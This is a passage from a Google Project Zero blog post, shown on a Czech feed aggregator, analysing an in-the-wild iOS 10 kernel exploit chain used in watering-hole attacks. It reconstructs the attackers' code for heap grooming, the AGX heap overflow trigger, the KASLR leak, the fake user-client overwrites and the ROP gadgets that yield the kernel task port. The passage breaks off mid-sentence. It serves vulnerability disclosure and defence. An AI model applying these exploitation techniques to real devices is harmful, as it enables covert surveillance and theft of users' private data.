Project Zero

Syndikovat obsah
News and updates from the Project Zero team at Google
Aktualizace: 44 min 52 sek zpět

A very deep dive into iOS Exploit chains found in the wild

30 Srpen, 2019 - 02:06
Posted by Ian Beer, Project Zero

Project Zero’s mission is to make 0-day hard. We often work with other companies to find and report security vulnerabilities, with the ultimate goal of advocating for structural security improvements in popular systems to help protect people everywhere.  

Earlier this year Google's Threat Analysis Group (TAG) discovered a small collection of hacked websites. The hacked sites were being used in indiscriminate watering hole attacks against their visitors, using iPhone 0-day.  

There was no target discrimination; simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant. We estimate that these sites receive thousands of visitors per week.  

TAG was able to collect five separate, complete and unique iPhone exploit chains, covering almost every version from iOS 10 through to the latest version of iOS 12. This indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years.

I’ll investigate what I assess to be the root causes of the vulnerabilities and discuss some insights we can gain into Apple's software development lifecycle. The root causes I highlight here are not novel and are often overlooked: we'll see cases of code which seems to have never worked, code that likely skipped QA or likely had little testing or review before being shipped to users.

Working with TAG, we discovered exploits for a total of fourteen vulnerabilities across the five exploit chains: seven for the iPhone’s web browser, five for the kernel and two separate sandbox escapes. Initial analysis indicated that at least one of the privilege escalation chains was still 0-day and unpatched at the time of discovery (CVE-2019-7287 & CVE-2019-7286). We reported these issues to Apple with a 7-day deadline on 1 Feb 2019, which resulted in the out-of-band release of iOS 12.1.4 on 7 Feb 2019. We also shared the complete details with Apple, which were disclosed publicly on 7 Feb 2019.

Now, after several months of careful analysis of almost every byte of every one of the exploit chains, I’m ready to share these insights into the real-world workings of a campaign exploiting iPhones en masse.

This post will include:
  • detailed write-ups of all five privilege escalation exploit chains;
  • a teardown of the implant used, including a demo of the implant running on my own devices, talking to a reverse-engineered command and control server and demonstrating the capabilities of the implant to steal private data like iMessages, photos and GPS location in real-time, and
  • analysis by fellow team member Samuel Groß on the browser exploits used as initial entry points.

Let’s also keep in mind that this was a failure case for the attacker: for this one campaign that we’ve seen, there are almost certainly others that are yet to be seen.

Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group. All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them.

I hope to guide the general discussion around exploitation away from a focus on the the million dollar dissident and towards discussion of the marginal cost for monitoring the n+1'th potential future dissident. I shan't get into a discussion of whether these exploits cost $1 million, $2 million, or $20 million. I will instead suggest that all of those price tags seem low for the capability to target and monitor the private activities of entire populations in real time.

I recommend that these posts are read in the following order:
  1. iOS Exploit Chain #1
  2. iOS Exploit Chain #2
  3. iOS Exploit Chain #3
  4. iOS Exploit Chain #4
  5. iOS Exploit Chain #5
  6. JSC Exploits
  7. Implant Teardown

Kategorie: Hacking & Security

In-the-wild iOS Exploit Chain 1

30 Srpen, 2019 - 02:05
Posted by Ian Beer, Project Zero


This exploit provides evidence that these exploit chains were likely written contemporaneously with their supported iOS versions; that is, the exploit techniques which were used suggest that this exploit was written around the time of iOS 10. This suggests that this group had a capability against a fully patched iPhone for at least two years.  
This is one of the three chains (of five chains total) which exploit only one kernel vulnerability that was directly reachable from the Safari sandbox.In-the-wild iOS Exploit Chain 1 - AGXAllocationList2::initWithSharedResourceList heap overflowWe'll look first at the earliest chain we found. This targets iOS 10.0.1-10.1.1 and has probably been active since September 2016.

targets: 5s through 7, 10.0.1 through 10.1.1

supported version matrix:iPhone6,1 (5s, N51AP)iPhone6,2 (5s, N53AP)iPhone7,1 (6 plus, N56AP)iPhone7,2 (6, N61AP)iPhone8,1 (6s, N71AP)iPhone8,2 (6s plus, N66AP)iPhone8,4 (SE, N69AP)iPhone9,1 (7, D10AP)iPhone9,2 (7 plus, D11AP)iPhone9,3 (7, D101AP)iPhone9,4 (7 plus, D111AP)

version support is slightly different between platforms:iPhone 6,*;7,*;8,*:14A403 (10.0.1 - 13 Sep 2016) this is the first public version of iOS 1014A456 (10.0.2 - 23 Sep 2016)14B72 (10.1 - 24 Oct 2016)14B100 (10.1.1 - 31 Oct 2016) 14B150 (10.1.1 - 9 Nov 2016)

iPhone 9,*:14A403 (10.0.1 - 13 Sep 2016)14A456 (10.0.2 - 23 Sep 2016)14A551 (10.0.3 - 17 Oct 2016) : NOTE: this version was iPhone 7 only; "cellular connectivity problem)14B72c (10.1 - 24 Oct 2016)14B100 (10.1.1 - 31 Oct 2016) 14B150 (10.1.1 - 9 Nov 2016)

First unsupported version: 10.2 - 12 December 2016The first kernel vulnerabilityThe first kernel vulnerability is a heap overflow in the function AGXAllocationList2::initWithSharedResourceList, part of the com.Apple.AGX kext, a driver for the embedded GPU in the iPhone. The vulnerability is reachable from the WebContent sandbox, there is no separate sandbox escape vulnerability.
AGXAllocationList2::initWithSharedResourceList is a C++ virtual member method which takes two arguments, a pointer to an IOAccelShared2 object and a pointer to an IOAccelSegmentResourceListHeader object. That resource list header pointer points to memory which is shared with userspace and the contents are fully attacker-controlled. The bug lies in the code which parses that resource list structure. The structure looks like this:

There's an 0x18 byte header structure, the last dword of which is a count of the number of following sub-descriptor structures. Each of those sub-descriptor structures is 0x40 bytes, with the last two bytes being a uint16_t count of sub-entries contained in the sub-descriptor.

The sub-descriptor contains two arrays, one of dword resource-id values, and one of two-byte flags. They are meant to be seen as pairs, with the first flag matching up with the first resource id.

The driver reads the n_entries value from shared memory and multiplies it by 6 to determine what it believes should be the maximum total number of sub-resources across all the sub-descriptors:

n_entries = *(_DWORD *)(shmem_ptr + 0x14);n_max_subdescriptors = 6 * n_entries;
This value is then multiplied by 8, as for each subresource_id they'll store a pointer:

resources_buf = IOMalloc(8 * n_max_subdescriptors);
The code then continues on to parse the sub-descriptors:

n_entries = *(_DWORD *)(shmem_ptr + 0x14);...void* resource = NULL;size_t total_resources = 0;input = (struct input*)shmem_ptr;struct sub_desc* desc = &input->descs[0];for (i = 0; i < n_entries; i++) {  for (int j = 0; j < desc->n_sub_entries; j+) {        int err = IOAccelShared2::lookupResource(ioaccel_shared,                                             desc->resource_ids[j],                                             &resource);    if (err) {      goto fail;    }
    unsigned short flags = desc->flags[j];
    if (flags_invalid(flags)) {      goto fail;    }    resources_buf[total_resources++] = resource;  }...}
The issue is that the code never validates the assumption that each sub-descriptor has at-most 6 sub-entries; there's actually space in the structure for 7 completely controlled resource_id and flag pairs. The code assumes that resources_buf was allocated for the worst case of 6 entries per sub-descriptor, so there are no bounds checks when the loop writes to resources_buf.

Since n_entries is completely controlled, the attacker can control the size passed to IOMalloc. They can also control the number of sub-descriptors which contain 7 rather than 6 entries, allowing them to write a controlled number of pointers off the end of the target IOMalloc allocation. Those will be pointers to IOAccelResource2 objects.
Note that the second fetch of n_entries from shared memory isn't a decompiler error; it's really there in the binary:

fetch LDR  W8, [X19,#0x14]...fetch LDR  W8, [X19,#0x14]
This is not the bug which was exploited; in fact this variant wasn't fixed until iOS 12. See the code in Appendix A for the trigger for this variant. Note that this would have meant that with only minor changes the exploit would have continued to work for years after the initial patch. The variant overflows the same buffer with the same values.
startAll the exploits start by calling task_threads() then thread_terminate() in a loop to stop all other running threads in the WebContent task where the attackers get initial remote code execution.

This first chain uses the system loader to resolve symbols but they chose to not link against the IOSurface framework which they use, so they call dlopen() to get a handle to the IOSurface.dylib userspace library and resolve two function pointers (IOSurfaceCreate and IOSurfaceGetID) via dlsym(). These will be used later.System IdentificationThey read the hw.machine sysctl variable to get the device model name (which is a string like "iPhone6,1") and read the ProductBuildVersion value from the CFDictionary returned by  CFCopySystemVersionDictionary() to get the OS build ID. From this combination they can determine exactly which kernel image is running on the device.

They format this information into a string like "iPhone6,1(14A403)" (which would be for iOS 10.0.1 running on iPhone 5S.) From the __DATA segment of the exploit binary they read a serialized NSDictionary (via [NSKeyedUnarchiver unarchiveObjectWithData:].) The dictionary maps the supported hardware and kernel image pairs to structures containing pointers and offsets used later in the exploit.

{    "iPhone6,1(14A403)" = <a8a20700 00000000 40f60700 00000000 50885000 00000000 80a05a00 00000000 0c3c0900 00000000 c41f0800 00000000 28415a00 00000000 98085300 00000000 60f56000 00000000 005a4600 00000000 50554400 00000000 a4b73a00 00000000 00001000 00000000 50a05a00 00000000 b8a05a00 00000000 68e4fdff ffffffff>;    "iPhone6,1(14A456)" = <a8a20700 00000000 40f60700 00000000 50885000 00000000 80a05a00 00000000 0c3c0900 00000000 c41f0800 00000000 28415a00 00000000 98085300 00000000 60f56000 00000000 005a4600 00000000 50554400 00000000 a4b73a00 00000000 00001000 00000000 50a05a00 00000000 b8a05a00 00000000 68e4fdff ffffffff>;....}
They read the hw.memsize sysctl to determine whether the device has more than 1GB of RAM. Devices with 1GB of RAM (5s, 6, 6 plus) use a 4kB physical page size, whereas those with more than 1GB of RAM use 16kB physical pages. This difference is important because the kernel zone allocator has slightly different behaviour when physical page sizes are different. We'll look more closely at these differences when they become relevant.
ExploitationThey open an IOSurfaceRootUserClient:

matching_dict = IOServiceMatching("IOSurfaceRoot");ioservice = IOServiceGetMatchingService(kIOMasterPortDefault, matching_dict);IOServiceOpen(ioservice,              mach_task_self(),              0, // the userclient type              &userclient);
IOSurfaces are intended to be used as buffers for graphics operations, but none of the exploits use this intended functionality. Instead they use one other very convenient feature: the ability to associate arbitrary kernel OSObjects with an IOSurface for heap grooming.

The documentation for IOSurfaceSetValue nicely explains its functionality:

This call lets you attach CF property list types to an IOSurface buffer. This call is expensive (it must essentially serialize the data into the kernel) and thus should be avoided whenever possible.

Those Core Foundation property list objects will be serialized in userspace then the kernel will deserialize them into their corresponding OSObject types and attach them to the IOSurface:

CFDictionary -> OSDictionary
CFSet        -> OSSetCFNumber     -> OSNumberCFBoolean    -> OSBooleanCFString     -> OSStringCFData       -> OSData
The last two types are of particular interest as they're variable-sized. By serializing different length CFString and CFData objects as IOSurface properties you can exercise quite a lot of control over the kernel heap. Even more importantly, these properties can be read back in a non-destructive way via IOSurfaceCopyValue, making them an excellent target for building memory disclosure primitives from memory corruption vulnerabilities. We'll see both these techniques used multiple times across the exploit chains.
What is IOKit?IOKit is the framework used in iOS for building device drivers. It's written in C++ and drivers can make use of object-oriented features, such as inheritance, to aid the rapid development of new code.

An IOKit driver which wishes to communicate with userspace in some way consists of two major parts: an IOService and an IOUserClient (often just called a user client.)

IOServices can be thought of as providing the functionality of the driver.

The IOUserClient is the interface between the IOService and userspace clients of the driver. There can be a large number of IOUserClients per IOService, but typically there's only one (or a small number) of IOServices per hardware device.

The reality is of course more complex, but this simplified view suffices to understand the relevance of the attack surfaces.
Talking to IOKitUserspace communicates with IOUserClient objects via external methods. These can be thought of as syscalls exposed by the IOUserClient objects to userspace, callable by any process which has a send right to the mach port representing the IOUserClient object. External methods are numbered and can take variable sized input arguments. We'll look in great detail at exactly how this works when it becomes necessary for future exploits in the series.

Let's get back to the first exploit chain and see how they get started:Setting up the triggerThey open an AGXSharedUserClient:

matching_dict = IOServiceMatching("IOGraphicsAccelerator2");agx_service = IOServiceGetMatchingService(kIOMasterPortDefault, matching_dict)AGXSharedUserClient = 0;IOServiceOpen(agx_service,              mach_task_self(),              2, // type -> AGXSharedUserClient              &AGXSharedUserClient)
In IOKit parlance matching is the process of finding the correct device driver for a purpose; in this case they're using the matching system to open a user client connection to a particular driver.

The call to IOServiceOpen will invoke a sandbox policy check. Here's the relevant section from the sandbox profile on iOS which allows access to this IOKit device driver from inside the MobileSafari renderer process:

(allow iokit-open       (iokit-user-client-class "IOSurfaceRootUserClient")       (iokit-user-client-class "IOSurfaceSendRight")       (iokit-user-client-class "IOHIDEventServiceFastPathUserClient")       (iokit-user-client-class "AppleKeyStoreUserClient")       (require-any (iokit-user-client-class "IOAccelDevice")                    (iokit-user-client-class "IOAccelDevice2")                    (iokit-user-client-class "IOAccelSharedUserClient")                    (iokit-user-client-class "IOAccelSharedUserClient2")                    (iokit-user-client-class "IOAccelSubmitter2")                    (iokit-user-client-class "IOAccelContext")                    (iokit-user-client-class "IOAccelContext2"))       (iokit-user-client-class "IOSurfaceAcceleratorClient")       (extension "")       (iokit-user-client-class "AppleJPEGDriverUserClient")       (iokit-user-client-class "IOHIDLibUserClient")       (iokit-user-client-class "IOMobileFramebufferUserClient"))
AGXSharedUserClient, though not explicitly mentioned in the profile, is allowed because it inherits from IOAccelSharedUserClient2. This human-readable version of the sandbox profile was generated by the sandblaster tool from an iOS 11 kernelcache.

I mentioned earlier that the bug is triggered by the kernel reading a structure from shared memory; the next step in the exploit is to use the AGX driver's external method interface to allocate two shared memory regions, using external method 6 (create_shmem) of the AGXSharedUserClient:

create_shmem_result_size = 0x10LL;u64 scalar_in = 4096LL; // scalar in = sizev42 = IOConnectCallMethod(        AGXSharedUserClient,        6,          // selector number for create_shmem external method        &scalar_in, // scalar input, value is shm size        1,          // number of scalar inputs        0,        0,        0,        0,        &create_shmem_result,       // structure output pointer        &create_shmem_result_size); // structure output size pointer
IOConnectCallMethod is the main (though not the sole) way to call external methods on userclients. The first argument is the mach port name which represents this userclient connection. The second is the external method number (called the selector.) The remaining arguments are the inputs and outputs.

This method returns a 16-byte structure output which looks like this:

struct create_shmem_out {  void* base;  u32 size;  u32 id;};
base is the address in the task where the driver mapped the shared memory, size is the size and id a value used to refer to this resource later.

They allocate two of these shared memory regions; the first is left empty and the second will contain the trigger allocation list structure.

They also create a new IOAccelResource with ID 3 via the AGXSharedUserClient external method 3 (IOAccelSharedUserClient::new_resource.)Heap groomThe loop containing the trigger function is very curious; right before triggering the bug they create around 100 threads. For me when I was first trying to determine the root-cause of the bug they were exploiting this pointed towards one of two things:

  1. They were exploiting a race condition bug.
  2. They were trying to remove noise from the heap, by busy looping many threads and preventing other processes from using the kernel heap.

Here's the outer loop which is creating the threads:

for (int i = 0; i < constant_0x10_or_0x13 + 1; i++) {  for ( j = 0; j < v6 - 1; ++j ){    pthread_create(&pthread_t_array[iter_cnt],                   NULL,                   thread_func,                   &domain_socket_fds[2 * iter_cnt]);    while (!domain_socket_fds[2 * iter_cnt] ) {;};    n_running_threads = ++iter_cnt;     usleep(10);  }  send_kalloc_reserver_message(global_mach_port[i + 50],                               target_heap_object_size,                               1);}
Here's the function passed to pthread_create, it's pretty clear that neither of those hypotheses were even close to accurate:
void* thread_func(void* arg) {  int sockets[2] = {0};  
  global_running_threads++;  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {    return NULL;  }
  char buf[256];  struct msghdr_x hdrs[1024] = {0};    struct iovec iov;  iov.iov_base = buf;  iov.iov_len = 256;
  for (int i = 0; i < constant_value_from_offsets/0x20; i++) {    hdrs[i].msg_iov = &iov;    hdrs[i].msg_iovlen = 1;  }    *(int*)arg = sockets[0];  *((int*)arg + 1) = sockets[1];
  recvmsg_x(sockets[0], hdrs, constant_value_from_offsets/0x20, 0);
  return NULL;}
This is pretty clearly not a trigger for a shared-memory bug. They're also very unlikely to be using this to busy-loop a cpu core, the recvmsg_x syscall will block until there's data to be read and yield the CPU back to the scheduler.

The only hint to what's going on is that the number of loop iterations is set by a value read from the offsets data structure they parsed from the NSArchiver. This indicates that perhaps this is something like a novel heap-grooming technique. Let's look at the code for recvmsg_x and try to work out what's going on.recvmsg_x heap groomThe prototype for the recvmsg_x syscall is:

user_ssize_t recvmsg_x(int s, struct msghdr_x *msgp, u_int cnt, int flags);
The msgp argument is a pointer to an array of msghdr_x structures:

struct msghdr_x {  user_addr_t msg_name;       /* optional address */  socklen_t   msg_namelen;    /* size of address */  user_addr_t msg_iov;        /* scatter/gather array */  int         msg_iovlen;     /* # elements in msg_iov */  user_addr_t msg_control;    /* ancillary data, see below */  socklen_t   msg_controllen; /* ancillary data buffer len */  int         msg_flags;     /* flags on received message */  size_t      msg_datalen;    /* byte length of buffer in msg_iov */};
The cnt argument is the number of these structures contained in the array. In the exploit the msg_iov is set to always point to the same single-entry iovec which points to a 256-byte stack buffer, and msg_iovlen is set to 1 (the number of iovec entries.)

The recvmsg_x syscall is implemented in bsd/kern/uipc_syscalls.c. It will initially make three variable-sized kernel heap allocations:

user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x),                     M_TEMP, M_WAITOK | M_ZERO);...recv_msg_array = alloc_recv_msg_array(uap->cnt);...umsgp = _MALLOC(uap->cnt * size_of_msghdr,                M_TEMP, M_WAITOK | M_ZERO);
The msgp userspace buffer is then copied in to the user_msg_x buffer:

error = copyin(uap->msgp, umsgp, uap->cnt * size_of_msghdr);
sizeof(struct user_msghdr_x) is 0x38, and size_of_msghdr is also 0x38. alloc_recv_msg_array is just a simple wrapper around _MALLOC which multiplies count by sizeof(struct recv_msg_elem):

struct recv_msg_elem *alloc_recv_msg_array(u_int count){  struct recv_msg_elem *recv_msg_array;
  recv_msg_array = _MALLOC(count * sizeof(struct recv_msg_elem),                           M_TEMP, M_WAITOK | M_ZERO);
  return (recv_msg_array);}
sizeof(struct recv_msg_elem) is 0x20. Recall that the grooming thread function passed a constant divided by 0x20 as the cnt argument to the recvmsg_x syscall; it's quite likely therefore that this is the allocation which is being targeted. So what's in here?

It's allocating an array of struct recv_msg_elems:

struct recv_msg_elem {  struct uio *uio;  struct sockaddr *psa;  struct mbuf *controlp;  int which;  int flags;};
This array is going to be filled in by internalize_recv_msghdr_array:

error = internalize_recv_msghdr_array(umsgp,  IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32,  UIO_READ, uap->cnt, user_msg_x, recv_msg_array);
This function allocates and initializes a kernel uio structure for each of the iovec arrays contained in the input array of msghdr_x's:

recv_msg_elem->uio = uio_create(user_msg->msg_iovlen, 0,     spacetype, direction);
error = copyin_user_iovec_array(user_msg->msg_iov, spacetype, user_msg->msg_iovlen, iovp);
uio_create allocates space for the uio structure and the iovector base and length pointers inline:

uio_t uio_create(int a_iovcount,     /* number of iovecs */                 off_t a_offset,     /* current offset */                 int a_spacetype,    /* type of address space */                 int a_iodirection ) /* read or write flag */{  void*  my_buf_p;  size_t my_size;  uio_t  my_uio;   my_size = UIO_SIZEOF(a_iovcount);  my_buf_p = kalloc(my_size);  my_uio = uio_createwithbuffer(a_iovcount,                                 a_offset,                                a_spacetype,                                a_iodirection,                                my_buf_p,                                my_size );
  if (my_uio != 0) {    /* leave a note that we allocated this uio_t */    my_uio->uio_flags |= UIO_FLAGS_WE_ALLOCED;  }   return( my_uio );}
here's UIO_SIZEOF:

#define UIO_SIZEOF( a_iovcount ) \  ( sizeof(struct uio) + (MAX(sizeof(struct user_iovec), sizeof(struct kern_iovec)) * (a_iovcount)) )
struct uio looks like this:

struct uio {  union iovecs uio_iovs;    /* current iovec */  int uio_iovcnt;           /* active iovecs */  off_t uio_offset;  enum uio_seg uio_segflg;  enum uio_rw uio_rw;  user_size_t uio_resid_64;  int uio_size;             /* size for use with kfree */  int uio_max_iovs;         /* max number of iovecs this uio_t can hold */  u_int32_t uio_flags; };
There's a lot going on here, let's look at this diagramatically:

On 4k devices they spin up 7 threads, which will make 7 of the recv_msg_elem array allocations, then they send a kalloc_reserver message which will make one more target kalloc allocation which can be free'd independently. Heap grooming technique 2: out-of-line memory in mach messagesAs you can see from the diagram above, the recv_msg_elem allocations are interspersed with 4kb kalloc allocations. They make these allocations via crafted mach messages. Here's the function which builds and sends these messages:

struct kalloc_reserver_message {  mach_msg_base_t msg;  mach_msg_ool_descriptor_t desc[62];};
intsend_kalloc_reserver_message(mach_port_t dst_port,                             int kalloc_size,                             int n_kallocs){  struct kalloc_reserver_message msg = {0};  char buf[0x800] = {0};
  msg.header.msgh_bits =    MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND,                       0,                       0,                       MACH_MSGH_BITS_COMPLEX);
  msg.header.msgh_remote_port = dst_port;  msg.header.msgh_size = sizeof(mach_msg_base_t) +                         (n_kallocs * sizeof(mach_msg_ool_descriptor_t));  msg->body.msgh_descriptor_count = n_kallocs;
  for (int i = 0; i < n_kallocs; i++) {    msg.descs[i].address = buf;    msg.descs[i].size    = kalloc_size - 24;    msg.descs[i].type    = MACH_MSG_OOL_DESCRIPTOR;  }
  err = mach_msg(&msg.header,                 MACH_SEND_MSG,                 msg.header.msgh_size,                 0,                  0,                 0,                 0);
  return (err == KERN_SUCCESS);}
A mach message may contain "out-of-line data". This is intended to be used to send larger data buffers in a mach message while allowing the kernel to potentially use virtual memory optimisations to avoid copying the contents of the memory. (See my recent P0 blog post on finding and exploiting vulnerabilities in those tricks for more details.)

Out-of-line memory regions are specified in a mach message using the following descriptor structure in the kernel-processed region of the message:

typedef struct {  void*                      address;  boolean_t                  deallocate: 8;  mach_msg_copy_options_t    copy: 8;  unsigned int               pad1: 8;  mach_msg_descriptor_type_t type: 8;  mach_msg_size_t            size;} mach_msg_ool_descriptor_t;
address points to the base of the buffer to be sent in the message and size is the length of the buffer in bytes. If the size value is small (less than two physical pages) then the kernel will not attempt to perform any virtual memory trickery but instead simply allocate an equally sized kernel buffer via kalloc and copy the contents of the region to be sent into there.

The kernel buffer for the copy has the following 24-byte header at the start:

struct vm_map_copy {  int type;  vm_object_offset_t offset;  vm_map_size_t size;  union {    struct vm_map_header hdr;      /* ENTRY_LIST */    vm_object_t          object; /* OBJECT */    uint8_t              kdata[0]; /* KERNEL_BUFFER */  } c_u;};
That's the reason the size field in the descriptor has 24 subtracted from it. This technique is used frequently throughout the exploit chains to make controlled-size kalloc allocations (with almost completely controlled data.) By destroying the port to which the reserver message was sent without receiving the message they can cause the kalloc allocations to be free'd.

They repeat the recv_msg_elem/kalloc_reserver layout a few times, trying to improve the odds that one of the kalloc_reservers lies just before a recv_msg_elem array allocation. On 16k devices they start 15 threads at a time, then send one kalloc_reserver message. This makes sense as 16 target allocation sized objects would fit within one target-size'd kalloc chunk on 16k devices.

They then free all the kalloc_reservers (by destroying the ports to which the message were sent) in the opposite order that they were allocated, and then reallocate half of them. The idea here is to try to ensure that the next kalloc allocation to be allocated from the target kalloc.4096 zone will fall in one of the gaps in-between the recv_msg_arrays:

Once the groom is set up and the holes in the heap are likely in the right place they trigger the bug.

The trigger shared resource list is set up such that it will make a 4kb kalloc allocation (hopefully landing in one of the gaps) then the bug will cause an IOAccelResource pointer to be written one element off the end of that buffer, corrupting the first qword value of the following recv_msg_elem array:

If the heap groom worked this will have corrupted one of the uio pointers, overwriting it with a pointer to an IOAccelResource.

They then call external method 1 on the AGXSharedUserClient (delete_resource) which will free the IOAccelResource. This means that one of those uio pointers now points to a free'd IOAccelResource

Then they use the IOSurface properties technique to allocate many 0x190 byte OSData objects in the kernel with the following layout:

u32 +0x28 = 0x190;u32 +0x30 = 2;
Here's the code where they build that:

  char buf[0x190];  char key[100];
  memset(buf, 0, 0x190uLL);  *(uint32_t*)&buf[0x28] = 0x190;  *(uint32_t*)&buf[0x30] = 2;  id arr = [[NSMutableArray alloc] initWithCapacity: 100];  id data = [NSData dataWithBytes:buf length:100];  int cnt = 2 * (system_page_size / 0x200);  for (int = 0; i < cnt; i++) {    [arr addObject: data];  }
  memset(key, 0, 100;);  sprintf(key, 0, 100, "large_%d", replacement_attempt_cnt);
  return wrap_iosurfaceroot_set_value(key, val);
They are trying to reallocate the free'd memory with an OSData object. Overlaying those offsets against a struct uio you see that +0x28 is the uio_size field, and +0x30 the flags field. 2 is the following UIO flag value:

#define UIO_FLAGS_WE_ALLOCED 0x00000002
So they've replaced the dangling UIO with... a completely valid, if empty, UIO?

They're now in a situation where there are two pointers to the same allocation; both of which they can manipulate:

They then loop through each of the threads which are blocked on the recvmsg_x call and close both ends of the socketpair. This will cause the destruction of all the uios in the recv_msg_elems arrays. If this particular thread was the one which allocated the recv_msg_elems array which got corrupted by the heap overflow, then closing these sockets will cause the uio to be freed. Remember that they've now reallocated this memory to be the backing buffer for an OSData object. Here's uio_free:

void uio_free(uio_t a_uio) {  if (a_uio != NULL && (a_uio->uio_flags & UIO_FLAGS_WE_ALLOCED) != 0) {    kfree(a_uio, a_uio->uio_size);  }}
This fake uio allocation is pointed to by two pointers at this point; the uio and the OSData. By freeing the uio, they're leaving the OSData object with a dangling backing buffer pointer. It seems that the use of the threads and domain sockets was just a way of creating a heap allocation which had another heap allocation as the first pointer; the freeing of which they could control. It's certainly a novel technique but seems very fragile.

Immediately after freeing the uio (leaving the OSData object with the dangling pointer) they allocate 2 pages worth of IOSurfaceRootUserClients; hoping that one of them will overlap with the OSData backing buffer (the IOSurfaceRootUserClient will also be allocated from the same kalloc.512 zone.) They then read the contents of all the OSData objects (via IOSurfaceCopyProperty as mentioned earlier) and search for the 32-bit value 0x00020002, which is an OSObject reference count. If it's found then the replacement worked and they now have the contents of the IOSurfaceRootUserClient object inside the OSData backing buffer:

They read the vtable pointer from the IOSurfaceRootUserClient object which they use to determine the KASLR slide by subtracting the unslide value of the vtable pointer (which they get from the offsets dictionary object.)

They read two fields from the IOSurfaceRootUserClient:

+0xf0 = a pointer to their task struct, set in IOSurfaceRootUserClient::init+0x118 = pointer to this+0x110; they subtract 0x110 to get the address of the userclient

They make a complete copy of the IOSurfaceRootUserClient and modify two fields. They set the reference count to 0x80008 and they set the pointer at offset +0xe0 to point exactly 0xBC bytes below the kernel_task pointer in the kernel data segment.The kernel task portIn XNU the kernel is just another task, so like all other tasks it has a task port. A task port is mach port which, if you have a send right to it, allows complete control over the task. Back in iOS 10 before 10.3, there were no mitigations against using the kernel task port from userspace which made it a very attractive target for exploitation. If you could corrupt memory such that you gained a send right to this port, you got arbitrary kernel memory read and write, by design.

That's what they're going to try to do now.

They free the OSData replacer, and try to reallocate it again (using the key "huge") with the modified IOSurfaceRootUserClient inside more OSData objects.

They then loop through the IOSurfaceRootUserClient connection ports calling external method 13 (get_limits.)

Here's the relevant assembly from the implementation of get_limits. At this point the X0 register is the IOSurfaceRootUserClient, and X2 is an IOExternalMethodArguments*, which contains the arguments to the external method:

LDR     X8, [X2,#0x58] ; struct output bufferLDR     X9, [X0,#0xE0] ; should be IOSurfaceRoot, now arbitraryLDUR    X10, [X9,#0xBC]; controlled read at address val+0xBCSTR     X10, [X8]      ; write that value to struct output buffer...RET
Since the attackers have replaced the field at +0xE0 with a pointer to 0xBC bytes below the kernel_task pointer in the kernel data segment, the first 8 bytes of the structure output buffer when get_limits is called on the modified user client will contain the address of the kernel task struct!

They verify that those eight bytes do indeed look like a kernel pointer; then prepare for the final replacement. This time they replace 10 fields in the IOSurfaceRootUserClient:

OSData_kaddr is the kernel virtual address of the fake user client object (and the OSData object it's actually inside.)

userclient_copy[0x120] = OSData_kaddr + 0x1F8;userclient_copy[0x128] = 1;userclient_copy[0x1F8] = OSData_kaddr + 0x1B0;userclient_copy[0x1F0] = OSData_kaddr + 0x1A0;userclient_copy[0x1A0] = OSData_kaddr;userclient_copy[0x1E8] = kernel_runtime_base + offsets_9;userclient_copy[0xA8] = kernel_runtime_base + offsets_10;userclient_copy[0x1E0] = kernel_task + 0x90;userclient_copy[0x1B8] = our_task_t + 0x2C0;userclient_copy[0x1C0] = kernel_runtime_base + offsets_11;
offsets 9, 10 and 11 are read from the deserialized NSArchiver.

They use the iosurface property replacement trick for the last time; this time using the key "again". They then call external method 16 (get_surface_use_count) on the dangling IOSurfaceRooUserClient connection.

What's happening here? Let's follow execution flow from the start of the external method itself. At this point X0 will point to their modified IOSurfaceRootUserClient object seen above:

IOSurfaceRootUserClient::get_surface_use_count:STP   X22, X21, [SP,#-0x10+var_20]!STP   X20, X19, [SP,#0x20+var_10]STP   X29, X30, [SP,#0x20+var_s0]ADD   X29, SP, #0x20MOV   X20, X2MOV   X22, X1MOV   X19, X0MOV   W21, #0xE00002C2LDR   X0, [X19,#0xD8]BL    j__lck_mtx_lock_11LDR   W8, [X19,#0x128]         ; they set to 1CMP   W8, W22                  ; w22 == 0?B.LS  loc_FFFFFFF0064BFD94     ; not takenLDR   X8, [X19,#0x120]         ; x8 := &this+0x1f8LDR   X0, [X8,W22,UXTW#3]      ; x0 := &this+0x1b0CBZ   X0, loc_FFFFFFF0064BFD94 ; not takenBL    sub_FFFFFFF0064BA758
Execution continues here:

sub_FFFFFFF0064BA758LDR   X0, [X0,#0x40]           ; X0 := *this+0x1f0 = &this+0x1a0LDR   X8, [X0]                 ; X8 := thisLDR   X1, [X8,#0x1E8]          ; X1 := kernel_base + offsets_9BR    X1                   ; jump to offsets_9 gadget
They'll get arbitrary kernel PC control initially at offsets_9; which is the following gadget:

LDR   X2, [X8,#0xA8]           ; X2 := kernel_base + offsets_10LDR   X1, [X0,#0x40]           ; X1 := *(this+0x1e0)                               ; The value at that address is a pointer                               ; to 0x58 bytes below the kernel task port                               ; pointer inside the kernel task structureBR    X2                   ; jump to offsets_10 gadget
This loads a new, controlled value in to X1 then jumps to offsets_10 gadget:
This is OSSerializer::serialize:

MOV   X8, X1             ; address of pointer to kernel_task_port-0x58LDP   X1, X3, [X0,#0x18] ; X1 := *(this+0x1b8) == &task->itk_seatbelt                         ; X3 := *(this+0x1c0) == kbase + offsets_11LDR   X9, [X0,#0x10]     ; ignoredMOV   X0, X9MOV   X2, X8             ; address of pointer to kernel_task_port-0x58BR    X3             ; jump to offsets_11 gadget
offsets_11 is then a pointer to this gadget:

LDR   X8, [X8,#0x58] ; X8:= kernel_task_port                     ; that's an arbitrary readMOV   W0, #0STR   X8, [X1]       ; task->itk_seatbelt := kernel_task_port                     ; that's the arbitrary writeRET                  ; all done!
This gadget reads the value at the address stored in X8 plus 0x58, and writes that to the address stored in X1. The previous gadgets gave complete control of those two registers, meaning this gadget is giving them the ability to read a value from an arbitrary address and then write that value to an arbitrary address. The address they chose to read from is a pointer to the kernel task port, and the address they chose to write to points into the current task's special ports array. This read and write has the effect of giving the current task the ability to get a send right to the real kernel task port by calling:

